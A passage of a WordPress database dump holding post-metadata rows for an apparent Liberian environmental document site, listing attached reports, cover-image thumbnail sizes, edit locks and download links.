4341,'kava_extra_link_target','_blank'),(31117,4341,'quote_tab',''),(31118,4341,'kava_extra_quote_text',''),(31119,4341,'kava_extra_quote_cite',''),(31120,4341,'audio_tab',''),(31121,4341,'kava_extra_audio',''),(31122,4341,'kava_extra_audio_loop','false'),(31123,4341,'kava_extra_audio_autoplay','false'),(31124,4341,'kava_extra_audio_preload','false'),(31125,4341,'video_tab',''),(31126,4341,'kava_extra_video_type','library'),(31127,4341,'kava_extra_video_library',''),(31128,4341,'kava_extra_video_external',''),(31129,4341,'kava_extra_video_poster',''),(31130,4341,'kava_extra_video_width','770'),(31131,4341,'kava_extra_video_height','480'),(31132,4341,'kava_extra_video_loop','false'),(31133,4341,'kava_extra_video_autoplay','false'),(31134,4341,'kava_extra_video_preload','false'),(31135,4344,'_last_editor_used_jetpack','classic-editor'),(31136,4344,'_edit_lock','1632329940:42'),(31137,4344,'_edit_last','42'),(31138,4345,'_wp_attached_file','2021/09/TERMS-OF-REFERENCE-SYNTHESIZE-FINDING-AND-ASSESSMENTS.pdf'),(31139,4346,'_wp_attached_file','2021/09/TERMS-OF-REFERENCE-CAPACITY-DEVELOPMENT-STRATEGYAND-ACTION-PLAN.pdf'),(31140,4344,'_wp_page_template','default'),(31141,4344,'closed_date','2021-09-27'),(31142,4344,'owner','EPA'),(31143,4344,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/09/TERMS-OF-REFERENCE-SYNTHESIZE-FINDING-AND-ASSESSMENTS.pdf'),(31144,4348,'_last_editor_used_jetpack','classic-editor'),(31145,4348,'_edit_lock','1632331791:42'),(31146,4348,'_edit_last','42'),(31147,4348,'_wp_page_template','default'),(31148,4348,'closed_date','2021-09-27'),(31149,4348,'owner','EPA'),(31150,4348,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/09/TERMS-OF-REFERENCE-CAPACITY-DEVELOPMENT-STRATEGYAND-ACTION-PLAN.pdf'),(31151,4344,'_wp_old_date','2021-09-22'),(31152,4348,'_wp_old_date','2021-09-22'),(31153,4352,'_wp_attached_file','2021/09/Sate-of-Environment.png'),(31154,4352,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:505;s:6:\"height\";i:706;s:4:\"file\";s:31:\"2021/09/Sate-of-Environment.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Sate-of-Environment-215x300.png\";s:5:\"width\";i:215;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Sate-of-Environment-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"Sate-of-Environment-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:30:\"Sate-of-Environment-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:31:\"Sate-of-Environment-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:31:\"Sate-of-Environment-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:31:\"Sate-of-Environment-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:31:\"Sate-of-Environment-505x450.png\";s:5:\"width\";i:505;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:31:\"Sate-of-Environment-505x650.png\";s:5:\"width\";i:505;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:31:\"Sate-of-Environment-505x640.png\";s:5:\"width\";i:505;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:31:\"Sate-of-Environment-505x640.png\";s:5:\"width\";i:505;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31155,4353,'_wp_attached_file','2021/09/SOER-Final-Report-Liberia-@-February-4-2021-PRINT.pdf'),(31156,4238,'_pods_document_cover_image','a:1:{i:0;i:4352;}'),(31157,4238,'document_cover_image','4352'),(31158,4238,'_pods_attached_document','a:1:{i:0;i:4353;}'),(31159,4238,'attached_document','4353'),(31160,3087,'_last_editor_used_jetpack','classic-editor'),(31161,4354,'_wp_attached_file','2020/06/NEAP.png'),(31162,4354,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:702;s:4:\"file\";s:16:\"2020/06/NEAP.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"NEAP-219x300.png\";s:5:\"width\";i:219;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"NEAP-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"NEAP-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"NEAP-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"NEAP-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"NEAP-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"NEAP-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"NEAP-512x450.png\";s:5:\"width\";i:512;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:16:\"NEAP-512x650.png\";s:5:\"width\";i:512;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"NEAP-512x640.png\";s:5:\"width\";i:512;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:16:\"NEAP-512x640.png\";s:5:\"width\";i:512;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31163,4355,'_wp_attached_file','2020/06/Final-Final-NEAP-@-April-19-2021.pdf'),(31164,3087,'_wp_page_template','default'),(31165,3087,'_pods_document_cover_image','a:1:{i:0;i:4354;}'),(31167,3087,'_pods_attached_document','a:1:{i:0;i:4355;}'),(31169,3087,'document_cover_image','4354'),(31170,3087,'attached_document','4355'),(31171,4357,'_last_editor_used_jetpack','classic-editor'),(31172,4357,'_edit_lock','1670352969:42'),(31173,4357,'_edit_last','38'),(31174,4358,'_wp_attached_file','2021/09/SOE-2006.png'),(31175,4358,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:676;s:4:\"file\";s:20:\"2021/09/SOE-2006.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"SOE-2006-227x300.png\";s:5:\"width\";i:227;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"SOE-2006-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"SOE-2006-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"SOE-2006-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"SOE-2006-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"SOE-2006-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:20:\"SOE-2006-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"SOE-2006-512x450.png\";s:5:\"width\";i:512;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:20:\"SOE-2006-512x650.png\";s:5:\"width\";i:512;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:20:\"SOE-2006-512x640.png\";s:5:\"width\";i:512;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:20:\"SOE-2006-512x640.png\";s:5:\"width\";i:512;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31176,4359,'_wp_attached_file','2021/09/State-of-the-Environment-2006-Liberia.pdf'),(31177,4357,'_wp_page_template','default'),(31178,4357,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/State-of-the-Environment-2006-Liberia.pdf'),(31179,4357,'by','EPA'),(31180,4357,'year','2020'),(31181,4357,'_pods_document_cover_image','a:1:{i:0;i:4358;}'),(31182,4357,'document_cover_image','4358'),(31183,4357,'_pods_attached_document','a:1:{i:0;i:4359;}'),(31184,4357,'attached_document','4359'),(31185,2165,'_last_editor_used_jetpack','classic-editor'),(31186,4361,'_wp_attached_file','2019/11/NAPA.png'),(31187,4361,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:501;s:6:\"height\";i:707;s:4:\"file\";s:16:\"2019/11/NAPA.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"NAPA-213x300.png\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"NAPA-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"NAPA-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"NAPA-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"NAPA-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"NAPA-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"NAPA-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"NAPA-501x450.png\";s:5:\"width\";i:501;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:16:\"NAPA-501x650.png\";s:5:\"width\";i:501;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"NAPA-501x640.png\";s:5:\"width\";i:501;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:16:\"NAPA-501x640.png\";s:5:\"width\";i:501;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31188,2165,'_wp_page_template','default'),(31189,2165,'_pods_document_cover_image','a:1:{i:0;i:4361;}'),(31190,2165,'document_cover_image','4361'),(31191,2165,'attached_document','2170'),(31192,4363,'_last_editor_used_jetpack','classic-editor'),(31193,4363,'_edit_lock','1632404372:38'),(31194,4363,'_edit_last','38'),(31195,4364,'_wp_attached_file','2021/09/NDC.png'),(31196,4364,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:521;s:6:\"height\";i:666;s:4:\"file\";s:15:\"2021/09/NDC.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"NDC-235x300.png\";s:5:\"width\";i:235;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"NDC-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"NDC-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"NDC-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"NDC-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"NDC-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"NDC-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"NDC-521x450.png\";s:5:\"width\";i:521;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:15:\"NDC-521x650.png\";s:5:\"width\";i:521;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"NDC-521x640.png\";s:5:\"width\";i:521;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:15:\"NDC-521x640.png\";s:5:\"width\";i:521;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31197,4365,'_wp_attached_file','2021/09/Liberia-INDC-Final-Submission-Sept-30-2015.002.pdf'),(31198,4363,'_wp_page_template','default'),(31199,4363,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/Liberia-INDC-Final-Submission-Sept-30-2015.002.pdf'),(31200,4363,'by','EPA'),(31201,4363,'year','2012'),(31202,4363,'_pods_document_cover_image','a:1:{i:0;i:4364;}'),(31203,4363,'document_cover_image','4364'),(31204,4363,'_pods_attached_document','a:1:{i:0;i:4365;}'),(31205,4363,'attached_document','4365'),(31206,4368,'_last_editor_used_jetpack','classic-editor'),(31207,4368,'_edit_lock','1632405091:38'),(31208,4368,'_edit_last','38'),(31209,4369,'_wp_attached_file','2021/09/Introduction-to-the-Sate-of-Environment.png'),(31210,4369,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:993;s:6:\"height\";i:750;s:4:\"file\";s:51:\"2021/09/Introduction-to-the-Sate-of-Environment.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:51:\"Introduction-to-the-Sate-of-Environment-300x227.png\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:51:\"Introduction-to-the-Sate-of-Environment-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:51:\"Introduction-to-the-Sate-of-Environment-768x580.png\";s:5:\"width\";i:768;s:6:\"height\";i:580;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:51:\"Introduction-to-the-Sate-of-Environment-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:50:\"Introduction-to-the-Sate-of-Environment-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:51:\"Introduction-to-the-Sate-of-Environment-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:51:\"Introduction-to-the-Sate-of-Environment-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:51:\"Introduction-to-the-Sate-of-Environment-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:51:\"Introduction-to-the-Sate-of-Environment-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:51:\"Introduction-to-the-Sate-of-Environment-993x650.png\";s:5:\"width\";i:993;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:51:\"Introduction-to-the-Sate-of-Environment-600x453.png\";s:5:\"width\";i:600;s:6:\"height\";i:453;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:51:\"Introduction-to-the-Sate-of-Environment-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:51:\"Introduction-to-the-Sate-of-Environment-993x640.png\";s:5:\"width\";i:993;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31211,4370,'_wp_attached_file','2021/09/INTRODUCTION-PPT_RSoE-Training_Analytical-Framework.pptx'),(31212,4368,'_wp_page_template','default'),(31213,4368,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/INTRODUCTION-PPT_RSoE-Training_Analytical-Framework.pptx'),(31214,4368,'by','Prof. Emmanuel Oladipo'),(31215,4368,'year','2021'),(31216,4368,'_pods_document_cover_image','a:1:{i:0;i:4369;}'),(31217,4368,'document_cover_image','4369'),(31218,4368,'_pods_attached_document','a:1:{i:0;i:4370;}'),(31219,4368,'attached_document','4370'),(31220,4373,'_last_editor_used_jetpack','classic-editor'),(31221,4373,'_edit_lock','1632406498:38'),(31222,4373,'_edit_last','38'),(31223,4374,'_wp_attached_file','2021/09/ecowas-Environment-outlook.png'),(31224,4374,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:993;s:6:\"height\";i:750;s:4:\"file\";s:38:\"2021/09/ecowas-Environment-outlook.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"ecowas-Environment-outlook-300x227.png\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"ecowas-Environment-outlook-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"ecowas-Environment-outlook-768x580.png\";s:5:\"width\";i:768;s:6:\"height\";i:580;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:38:\"ecowas-Environment-outlook-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:37:\"ecowas-Environment-outlook-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:38:\"ecowas-Environment-outlook-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:38:\"ecowas-Environment-outlook-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:38:\"ecowas-Environment-outlook-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:38:\"ecowas-Environment-outlook-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:38:\"ecowas-Environment-outlook-993x650.png\";s:5:\"width\";i:993;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:38:\"ecowas-Environment-outlook-600x453.png\";s:5:\"width\";i:600;s:6:\"height\";i:453;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:38:\"ecowas-Environment-outlook-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:38:\"ecowas-Environment-outlook-993x640.png\";s:5:\"width\";i:993;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31225,4375,'_wp_attached_file','2021/09/Land-Chapter-Outline-2.pptx'),(31226,4373,'_wp_page_template','default'),(31227,4373,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/Land-Chapter-Outline-2.pptx'),(31228,4373,'by','Charles Sebukeera / ECOWAS'),(31229,4373,'year','2021'),(31230,4373,'_pods_document_cover_image','a:1:{i:0;i:4374;}'),(31231,4373,'document_cover_image','4374'),(31232,4373,'_pods_attached_document','a:1:{i:0;i:4375;}'),(31233,4373,'attached_document','4375'),(31234,4377,'_last_editor_used_jetpack','classic-editor'),(31235,4377,'_edit_lock','1632407072:38'),(31236,4377,'_edit_last','38'),(31237,4378,'_wp_attached_file','2021/09/CDC.png'),(31238,4378,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:551;s:6:\"height\";i:701;s:4:\"file\";s:15:\"2021/09/CDC.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"CDC-236x300.png\";s:5:\"width\";i:236;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"CDC-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"CDC-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"CDC-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"CDC-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"CDC-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"CDC-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"CDC-551x450.png\";s:5:\"width\";i:551;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:15:\"CDC-551x650.png\";s:5:\"width\";i:551;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"CDC-551x640.png\";s